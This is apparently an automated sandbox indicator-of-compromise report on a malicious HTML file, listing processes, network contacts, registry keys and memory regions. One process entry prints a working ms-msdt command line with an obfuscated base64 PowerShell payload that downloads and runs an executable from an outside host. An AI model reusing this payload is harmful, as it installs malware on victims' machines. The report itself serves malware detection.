IOC Report
1024203777.test.html

loading gif

Processes

Path
Cmdline
Malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html
C:\Windows\System32\msdt.exe
"C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,13757677598881729272,15879241280713586661,131072 /prefetch:8

URLs

Name
IP
Malicious
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
172.217.168.78
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
216.58.215.237
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
172.217.168.78

Domains

Name
IP
Malicious
accounts.google.com
216.58.215.237
www.google.com
172.217.168.36
clients.l.google.com
172.217.168.78
clients2.google.com
unknown

IPs

IP
Domain
Country
Malicious
172.217.168.78
clients.l.google.com
United States
192.168.2.1
unknown
unknown
172.217.168.36
www.google.com
United States
239.255.255.250
unknown
Reserved
216.58.215.237
accounts.google.com
United States
127.0.0.1
unknown
unknown
192.168.2.23
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
S-1-5-21-3853321935-2125563209-4053062332-1002
\Device\HarddiskVolume4\Windows\Fonts\timesi.ttf
ahfgeienlihckogmohjhadlkjgocpleb
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
gdaefkejpgkiemlaofpalmlakkmbjdnl
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
kmendfapggjehodndflmmgagdbamhnfd
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
mhjfbmdgcfjbbpaeojofohoefgiehjai
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
neajdppkdcdipfabeoofebfddakdcjhd
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nkeimhogjdpnpccoofpliimaahmaaome
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
prefs.preference_reset_time
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
ahfgeienlihckogmohjhadlkjgocpleb
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
gdaefkejpgkiemlaofpalmlakkmbjdnl
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
kmendfapggjehodndflmmgagdbamhnfd
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
neajdppkdcdipfabeoofebfddakdcjhd
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nkeimhogjdpnpccoofpliimaahmaaome
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nmmhkkegccagdldgiimedpiccmgmieda
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nmmhkkegccagdldgiimedpiccmgmieda
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nmmhkkegccagdldgiimedpiccmgmieda
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
dr
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
media.cdm.origin_data
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
software_reporter.reporting
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
media.storage_id_salt
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
google.services.last_account_id
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
google.services.account_id
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
settings_reset_prompt.last_triggered_for_startup_urls
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
settings_reset_prompt.last_triggered_for_homepage
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
module_blocklist_cache_md5_digest
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
software_reporter.prompt_seed
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
default_search_provider_data.template_url_data
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
safebrowsing.incidents_sent
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
pinned_tabs
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
browser.show_home_button
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
search_provider_overrides
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
settings_reset_prompt.last_triggered_for_default_search
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
prefs.preference_reset_time
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
software_reporter.prompt_version
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
google.services.last_username
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
session.startup_urls
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
session.restore_on_startup
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
settings_reset_prompt.prompt_wave
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
homepage
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
homepage_is_newtabpage
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
S-1-5-21-3853321935-2125563209-4053062332-1002
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
There are 47 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1ACCA239000
heap
page read and write
malicious
1ACCA230000
heap
page read and write
malicious
1ACCA414000
heap
page read and write
malicious
1F5D4580000
heap
page read and write
1ACCF0A0000
trusted library allocation
page read and write
2C8F6221000
heap
page read and write
1C3DDF02000
heap
page read and write
1C3DDD80000
trusted library allocation
page read and write
1D477429000
heap
page read and write
2C8F5D70000
heap
page read and write
1C3E35B0000
remote allocation
page read and write
6B5027E000
stack
page read and write
2C8F5D77000
heap
page read and write
2C8F6202000
heap
page read and write
2C8F5DA4000
heap
page read and write
2C8F5D70000
heap
page read and write
29EA0F9000
stack
page read and write
1ACCFA43000
unkown
page read and write
2C8F5BA0000
remote allocation
page read and write
2C8F5D94000
heap
page read and write
6B502FF000
stack
page read and write
1F5D45E7000
heap
page read and write
1D4773B0000
trusted library allocation
page read and write
1F5D45A0000
heap
page read and write
1ACCFA46000
unkown
page read and write
1ACCFA0A000
unkown
page read and write
12CFDA3C000
heap
page read and write
29E9F79000
stack
page read and write
1C3E342A000
trusted library allocation
page read and write
2C8F5429000
heap
page read and write
260FCFE000
stack
page read and write
1C3DDE78000
heap
page read and write
2C8F5D86000
heap
page read and write
260F77A000
stack
page read and write
2C8F5DB9000
heap
page read and write
2C8F5D99000
heap
page read and write
1D47747A000
heap
page read and write
1ACCA273000
heap
page read and write
260FB7F000
stack
page read and write
133A2C13000
heap
page read and write
1ACCFA3E000
unkown
page read and write
1C3E3425000
trusted library allocation
page read and write
1C3DDDF3000
trusted library allocation
page read and write
17B1ED2C000
heap
page read and write
2C8F5DAD000
heap
page read and write
12CFDA58000
heap
page read and write
1C3E3310000
trusted library allocation
page read and write
2C8F5D7F000
heap
page read and write
1ACCF9DF000
unkown
page read and write
1C3E3570000
trusted library allocation
page read and write
2C8F620A000
heap
page read and write
1F5D47A0000
heap
page read and write
2C8F5513000
heap
page read and write
1ACCF8B4000
unkown
page read and write
1C3DE759000
heap
page read and write
1D47747F000
heap
page read and write
1F5D5620000
trusted library allocation
page read and write
1F5D45B0000
heap
page read and write
1F5D55B0000
heap
page readonly
1C3DDE6E000
heap
page read and write
2C8F54E7000
heap
page read and write
2C8F5D8C000
heap
page read and write
1C3E32A0000
trusted library allocation
page read and write
1C3E34F0000
trusted library allocation
page read and write
1ACCF90B000
unkown
page read and write
1C3DE759000
heap
page read and write
12CFD800000
heap
page read and write
17B1ED14000
heap
page read and write
1C3DDE56000
heap
page read and write
1C3DEF10000
trusted library section
page readonly
1F5D55A0000
trusted library allocation
page read and write
2C8F6252000
heap
page read and write
260FFFA000
stack
page read and write
133A2D00000
heap
page read and write
1C3DDE9B000
heap
page read and write
6B504FE000
stack
page read and write
133A29C0000
heap
page read and write
133A2B30000
trusted library allocation
page read and write
12CFDA02000
heap
page read and write
1116FB000
stack
page read and write
B7E739C000
stack
page read and write
1ACCF9FD000
unkown
page read and write
2C8F545C000
heap
page read and write
2C8F5D98000
heap
page read and write
1C3E368A000
heap
page read and write
2C8F5D74000
heap
page read and write
1ACCC2C0000
heap
page read and write
17B1ECA0000
heap
page read and write
1C3E3600000
heap
page read and write
1ACCBF70000
heap
page read and write
11177E000
stack
page read and write
17B1ECF7000
heap
page read and write
B7E7A77000
stack
page read and write
2C8F5240000
heap
page read and write
1C3E364C000
heap
page read and write
1D477400000
heap
page read and write
1ACCFA39000
unkown
page read and write
1ACCA160000
heap
page read and write
1C3E38F0000
trusted library allocation
page read and write
2C8F6202000
heap
page read and write
1D47747A000
heap
page read and write
2C8F6218000
heap
page read and write
1C3DEC00000
trusted library allocation
page read and write
1ACCFA50000
unkown
page read and write
133A2C00000
heap
page read and write
1D477402000
heap
page read and write
2C8F5D7F000
heap
page read and write
2C8F5D88000
heap
page read and write
2C8F5481000
heap
page read and write
2C8F5D77000
heap
page read and write
2C8F6204000
heap
page read and write
2C8F5D8C000
heap
page read and write
2C8F5D82000
heap
page read and write
17B1EC50000
heap
page read and write
2C8F5DA9000
heap
page read and write
2C8F5BA0000
remote allocation
page read and write
1ACCFA11000
unkown
page read and write
17B1ED31000
heap
page read and write
12CFD970000
trusted library allocation
page read and write
26C87DB000
stack
page read and write
1F5D52F0000
trusted library allocation
page read and write
2C8F5D92000
heap
page read and write
29E9FFB000
stack
page read and write
133A2C55000
heap
page read and write
1C3DDE8B000
heap
page read and write
133A29D0000
heap
page read and write
2C8F5D94000
heap
page read and write
2C8F5D92000
heap
page read and write
1C3DE702000
heap
page read and write
260F47B000
stack
page read and write
1ACCA2E0000
heap
page read and write
1D477461000
heap
page read and write
260F677000
stack
page read and write
1C3DDE54000
heap
page read and write
1C3DE75B000
heap
page read and write
ED1D17F000
stack
page read and write
ED1C99B000
stack
page read and write
1C3E368B000
heap
page read and write
2C8F5462000
heap
page read and write
1ACCFA05000
unkown
page read and write
1ACCFA1E000
unkown
page read and write
1D477502000
heap
page read and write
1C3E3699000
heap
page read and write
260FBFF000
stack
page read and write
1D47748E000
heap
page read and write
133A2C50000
heap
page read and write
1C3DEF20000
trusted library section
page readonly
1C3E3420000
trusted library allocation
page read and write
1D477508000
heap
page read and write
29EA07E000
stack
page read and write
1ACCBD80000
heap
page read and write
2C8F5D75000
heap
page read and write
1C3E3614000
heap
page read and write
2C8F5D00000
heap
page read and write
1ACCFA5C000
unkown
page read and write
2C8F5D93000
heap
page read and write
B7E767E000
stack
page read and write
17B1ED14000
heap
page read and write
1D477320000
heap
page read and write
2C8F5DA1000
heap
page read and write
1C3DDC20000
heap
page read and write
1C3DDC80000
heap
page read and write
1C3DDDF0000
trusted library allocation
page read and write
12CFDA7B000
heap
page read and write
1C3DE718000
heap
page read and write
1C3DE600000
heap
page read and write
1F5D55C0000
trusted library allocation
page read and write
1ACCFA00000
unkown
page read and write
1F5D4770000
heap
page read and write
12CFDA00000
heap
page read and write
1F5D5350000
trusted library allocation
page read and write
1C3DE615000
heap
page read and write
1ACCA31A000
heap
page read and write
1ACCF8A0000
unkown
page read and write
1C3DE718000
heap
page read and write
1C3E342E000
trusted library allocation
page read and write
1C3E4010000
heap
page read and write
12CFDB00000
heap
page read and write
1C3E362C000
heap
page read and write
1C3E363F000
heap
page read and write
ED1D3FF000
stack
page read and write
ED1D4F8000
stack
page read and write
2C8F5D8C000
heap
page read and write
1D477500000
heap
page read and write
6B4FFFA000
stack
page read and write
260F97E000
stack
page read and write
2C8F6200000
heap
page read and write
2C8F5502000
heap
page read and write
260FA7B000
stack
page read and write
2C8F5D1A000
heap
page read and write
1ACCFA14000
unkown
page read and write
17B1ECE0000
heap
page read and write
1C3DE718000
heap
page read and write
1ACCFA5F000
unkown
page read and write
2C8F54E4000
heap
page read and write
133A2C4B000
heap
page read and write
ED1CC7E000
stack
page read and write
1F5D4520000
trusted library allocation
page read and write
2C8F5D7F000
heap
page read and write
6B503FA000
stack
page read and write
12CFDA8E000
heap
page read and write
1C3E3540000
trusted library allocation
page read and write
2C8F54D3000
heap
page read and write
17B1EC40000
heap
page read and write
1ACCA020000
heap
page read and write
1C3DDE73000
heap
page read and write
2C8F54FA000
heap
page read and write
2C8F5D8C000
heap
page read and write
1ACCBD91000
heap
page read and write
1D47743C000
heap
page read and write
2C8F543C000
heap
page read and write
133A2C29000
heap
page read and write
260FEFA000
stack
page read and write
133A3402000
trusted library allocation
page read and write
2C8F5D88000
heap
page read and write
1F5D52E0000
trusted library allocation
page read and write
1C3DEE10000
trusted library allocation
page read and write
12CFDA68000
heap
page read and write
ED1CE7E000
stack
page read and write
111EFF000
stack
page read and write
1D477451000
heap
page read and write
17B1ECE7000
heap
page read and write
B7E7C7D000
stack
page read and write
26C907F000
stack
page read and write
133A2C4E000
heap
page read and write
2C8F6221000
heap
page read and write
1C3E3440000
trusted library allocation
page read and write
1C3E34F0000
trusted library allocation
page read and write
26C8BFC000
stack
page read and write
1ACCA2E1000
heap
page read and write
1ACCF8E3000
unkown
page read and write
111BFB000
stack
page read and write
ED1CCFE000
stack
page read and write
1ACCFA19000
unkown
page read and write
1C3E4000000
heap
page read and write
133A2C3C000
heap
page read and write
1ACCF9F3000
unkown
page read and write
26C8AFE000
stack
page read and write
1ACCFA1B000
unkown
page read and write
1D47745C000
heap
page read and write
2C8F5DB3000
heap
page read and write
1ACCFA0F000
unkown
page read and write
1C3E3530000
trusted library allocation
page read and write
1ACCFA41000
unkown
page read and write
1C3E3550000
trusted library allocation
page read and write
1ACCA2CC000
heap
page read and write
26C8F7F000
stack
page read and write
1C3DDC10000
heap
page read and write
1C3DDE89000
heap
page read and write
1C3E3426000
trusted library allocation
page read and write
17B1EC55000
heap
page read and write
26100FE000
stack
page read and write
17B1ED08000
heap
page read and write
2C8F54C9000
heap
page read and write
B7E787E000
stack
page read and write
1C3DE759000
heap
page read and write
1C3DDEAA000
heap
page read and write
1C3E3421000
trusted library allocation
page read and write
1ACCA41E000
heap
page read and write
26C8E77000
stack
page read and write
2C8F51D0000
heap
page read and write
1ACCFA57000
unkown
page read and write
12CFE202000
trusted library allocation
page read and write
1ACCFA20000
unkown
page read and write
2C8F5508000
heap
page read and write
1C3E3450000
trusted library allocation
page read and write
1D47748B000
heap
page read and write
38B6B7F000
stack
page read and write
2C8F5516000
heap
page read and write
1C3E3420000
trusted library allocation
page read and write
1C3E32C0000
trusted library allocation
page read and write
2C8F6202000
heap
page read and write
260F87A000
stack
page read and write
2C8F5D1C000
heap
page read and write
2C8F6202000
heap
page read and write
1ACCFA34000
unkown
page read and write
260F4FF000
stack
page read and write
12CFDA88000
heap
page read and write
1C3E3441000
trusted library allocation
page read and write
1C3DEEF0000
trusted library section
page readonly
1ACCFA5A000
unkown
page read and write
1ACCA307000
heap
page read and write
2C8F6202000
heap
page read and write
1C3DE759000
heap
page read and write
2C8F5DA2000
heap
page read and write
2C8F5421000
heap
page read and write
1C3DDE41000
heap
page read and write
133A2C7C000
heap
page read and write
2C8F6218000
heap
page read and write
1F5D47B0000
trusted library allocation
page read and write
38B6A7E000
stack
page read and write
B7E7B7E000
stack
page read and write
1C3DE718000
heap
page read and write
1ACCA31A000
heap
page read and write
1C3DEF00000
trusted library section
page readonly
2C8F549E000
heap
page read and write
1C3E3450000
trusted library allocation
page read and write
17B1ED16000
heap
page read and write
111CF7000
stack
page read and write
1C3E3420000
trusted library allocation
page read and write
2C8F54B9000
heap
page read and write
1ACCA306000
heap
page read and write
2C8F5D8C000
heap
page read and write
1ACCA2D8000
heap
page read and write
2C8F5DA1000
heap
page read and write
260FD7F000
stack
page read and write
1C3DDEFA000
heap
page read and write
1D477481000
heap
page read and write
38B6529000
stack
page read and write
1C3E3560000
trusted library allocation
page read and write
ED1D2FE000
stack
page read and write
17B1ECC0000
heap
page read and write
133A2D13000
heap
page read and write
17B1ED2C000
heap
page read and write
12CFD870000
heap
page read and write
2C8F5DC8000
heap
page read and write
2C8F5D67000
heap
page read and write
1ACCF9F8000
unkown
page read and write
1117FE000
stack
page read and write
2C8F5DCD000
heap
page read and write
ED1D6FD000
stack
page read and write
17B1ED16000
heap
page read and write
12CFDA29000
heap
page read and write
1ACCA2F4000
heap
page read and write
1C3E3686000
heap
page read and write
1F5D45EF000
heap
page read and write
2C8F5D94000
heap
page read and write
260FC7F000
stack
page read and write
1C3E3663000
heap
page read and write
1C3E361E000
heap
page read and write
2C8F54CC000
heap
page read and write
6B5057C000
stack
page read and write
1F5D47A9000
heap
page read and write
1C3DEF40000
trusted library section
page readonly
133A2C71000
heap
page read and write
1D477E02000
trusted library allocation
page read and write
2C8F54FB000
heap
page read and write
17B1ED07000
heap
page read and write
1ACCF9E2000
unkown
page read and write
1ACCBD84000
heap
page read and write
1C3E369F000
heap
page read and write
1C3DE713000
heap
page read and write
1F5D47A5000
heap
page read and write
26C8C7E000
stack
page read and write
1ACCFA4D000
unkown
page read and write
26C8A7E000
stack
page read and write
1ACCA410000
heap
page read and write
17B1ED14000
heap
page read and write
2C8F5D26000
heap
page read and write
1C3E3460000
trusted library allocation
page read and write
1ACCA200000
heap
page read and write
1D47747F000
heap
page read and write
2C8F54E4000
heap
page read and write
2C8F5D9E000
heap
page read and write
1C3DDE90000
heap
page read and write
1C3DDD90000
trusted library section
page read and write
1C3E342C000
trusted library allocation
page read and write
2C8F5400000
heap
page read and write
1C3DF290000
trusted library allocation
page read and write
1C3E3890000
trusted library allocation
page read and write
2C8F5DA4000
heap
page read and write
2C8F5D7F000
heap
page read and write
1C3DE981000
trusted library allocation
page read and write
1C3E32C3000
trusted library allocation
page read and write
1C3DED20000
trusted library allocation
page read and write
1ACCFA48000
unkown
page read and write
2C8F5D92000
heap
page read and write
1F5D55D0000
trusted library allocation
page read and write
2C8F5D98000
heap
page read and write
1ACCA180000
heap
page read and write
1ACCFA0C000
unkown
page read and write
1C3E35B0000
remote allocation
page read and write
1ACCFA16000
unkown
page read and write
12CFDA13000
heap
page read and write
1D477513000
heap
page read and write
B7E76FF000
stack
page read and write
1C3E3570000
trusted library allocation
page read and write
1C3E3580000
trusted library allocation
page read and write
2C8F5DA1000
heap
page read and write
1C3E3428000
trusted library allocation
page read and write
ED1D277000
stack
page read and write
1ACCF9F6000
unkown
page read and write
1ACCF9FB000
unkown
page read and write
1ACCFA55000
unkown
page read and write
2C8F5D86000
heap
page read and write
1ACCA2D5000
heap
page read and write
1C3E3290000
trusted library allocation
page read and write
1ACCA2D8000
heap
page read and write
2C8F5DC8000
heap
page read and write
1ACCA2D9000
heap
page read and write
1C3DDF13000
heap
page read and write
2C8F5D5A000
heap
page read and write
17B1ED2C000
heap
page read and write
1C3DDE29000
heap
page read and write
26C8D7B000
stack
page read and write
1C3DE718000
heap
page read and write
2C8F6202000
heap
page read and write
111DFE000
stack
page read and write
2C8F5466000
heap
page read and write
2C8F5D7F000
heap
page read and write
1C3DE700000
heap
page read and write
2C8F5D92000
heap
page read and write
1C3E3690000
heap
page read and write
29E9BAB000
stack
page read and write
1ACCFA3C000
unkown
page read and write
2C8F5DA7000
heap
page read and write
1F5D45EE000
heap
page read and write
2C8F5DCA000
heap
page read and write
1C3E3697000
heap
page read and write
1F5D4510000
heap
page read and write
2C8F5D78000
heap
page read and write
B7E797B000
stack
page read and write
2C8F51E0000
heap
page read and write
B7E7D7F000
stack
page read and write
2C8F620A000
heap
page read and write
133A2D02000
heap
page read and write
1F5D5360000
trusted library allocation
page read and write
ED1D077000
stack
page read and write
2C8F5D77000
heap
page read and write
12CFDB02000
heap
page read and write
2C8F54A5000
heap
page read and write
2C8F5D7F000
heap
page read and write
2C8F5413000
heap
page read and write
1C3E367C000
heap
page read and write
1C3E3300000
trusted library allocation
page read and write
2C8F5457000
heap
page read and write
ED1D5FA000
stack
page read and write
133A2A30000
heap
page read and write
1C3E3520000
trusted library allocation
page read and write
12CFDB08000
heap
page read and write
1C3DE602000
heap
page read and write
2C8F5C02000
heap
page read and write
12CFDB13000
heap
page read and write
1C3DDE76000
heap
page read and write
12CFDA62000
heap
page read and write
2C8F5DB5000
heap
page read and write
2C8F5D73000
heap
page read and write
2C8F5D71000
heap
page read and write
2C8F5D92000
heap
page read and write
1ACCFA52000
unkown
page read and write
1C3DED01000
trusted library allocation
page read and write
6B5037F000
stack
page read and write
1D477310000
heap
page read and write
17B1ECF2000
heap
page read and write
1ACCF9E4000
unkown
page read and write
133A2D08000
heap
page read and write
1F5D45A8000
heap
page read and write
12CFD810000
heap
page read and write
1C3E4010000
heap
page read and write
133A2C86000
heap
page read and write
260FDFF000
stack
page read and write
1C3DDE00000
heap
page read and write
38B697F000
stack
page read and write
17B1ED30000
heap
page read and write
1C3E368F000
heap
page read and write
2C8F54F9000
heap
page read and write
2C8F5463000
heap
page read and write
1F5D45EE000
heap
page read and write
6B50479000
stack
page read and write
1ACCA2D0000
heap
page read and write
1ACCFA4B000
unkown
page read and write
1C3DE718000
heap
page read and write
2C8F5D82000
heap
page read and write
17B1ECEE000
heap
page read and write
17B1ED16000
heap
page read and write
2C8F5D96000
heap
page read and write
29EA17E000
stack
page read and write
2C8F5D7F000
heap
page read and write
1C3E3427000
trusted library allocation
page read and write
1D477466000
heap
page read and write
1C3E35B0000
remote allocation
page read and write
1C3E3460000
trusted library allocation
page read and write
2C8F5DB5000
heap
page read and write
ED1CF78000
stack
page read and write
2C8F5D86000
heap
page read and write
2C8F6202000
heap
page read and write
1C3DEF30000
trusted library section
page readonly
111AFB000
stack
page read and write
1C3DDE13000
heap
page read and write
2C8F5D86000
heap
page read and write
38B69FF000
stack
page read and write
1C3E368A000
heap
page read and write
2C8F5502000
heap
page read and write
2C8F545F000
heap
page read and write
1D477380000
heap
page read and write
1D477413000
heap
page read and write
2C8F54EA000
heap
page read and write
1ACCFA37000
unkown
page read and write
1C3E3444000
trusted library allocation
page read and write
1C3E3464000
trusted library allocation
page read and write
2C8F5BA0000
remote allocation
page read and write
38B6AFE000
stack
page read and write
2C8F5340000
trusted library allocation
page read and write
1ACCBD90000
heap
page read and write
2C8F54C2000
heap
page read and write
There are 485 hidden memdumps, click here to show them.